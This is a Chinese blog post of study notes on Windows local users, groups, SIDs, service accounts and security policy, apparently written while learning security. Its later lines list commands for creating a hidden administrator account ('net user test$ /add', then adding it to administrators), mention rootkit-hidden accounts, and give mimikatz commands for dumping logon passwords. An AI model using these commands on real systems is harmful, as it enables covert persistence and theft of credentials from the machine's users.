标签:use 安全策略 服务器管理 工具 打开 local user 网络服务 提权
每个用户身份权限不同;每个用户都有一个账号密码;唯一安全标识符。
查看本地用户和组
计算机右键->管理->本地用户和组 命令模式net user
查用户信息 SID等
whoami /user 对应注册表的这里
在服务器管理器中管理用户
本地安全策略 打开运行 secpol.msc 本地策略->用户权限分配
Administrator管理员用户 guset来宾用户
与使用计算机的人无关:system本地系统 local service本地服务与users权限一致较低,一旦这些服务被入侵,也没有访问系统重要位置的权限 network service网络服务
计算机右键->管理->服务
任务管理器
权限分配一个个太麻烦了,把用户都分配到组里面批量操作。
动态包含成员的内置组
成员由windows程序自动添加,动态变化 everyone 包含任何用户
有这个符号的就是加隐藏用户
net user test$ /add
添加用户组
net localgroup administrators test$ /add
通过rootkit工具超级隐藏账户(注册表也找不到)
windows的密码破不破解都无所谓。
privilege::debug /提权
sekurlsa::logonpasswords /抓取密码
标签:use 安全策略 服务器管理 工具 打开 local user 网络服务 提权
原文地址:https://www.cnblogs.com/sec875/p/12236238.html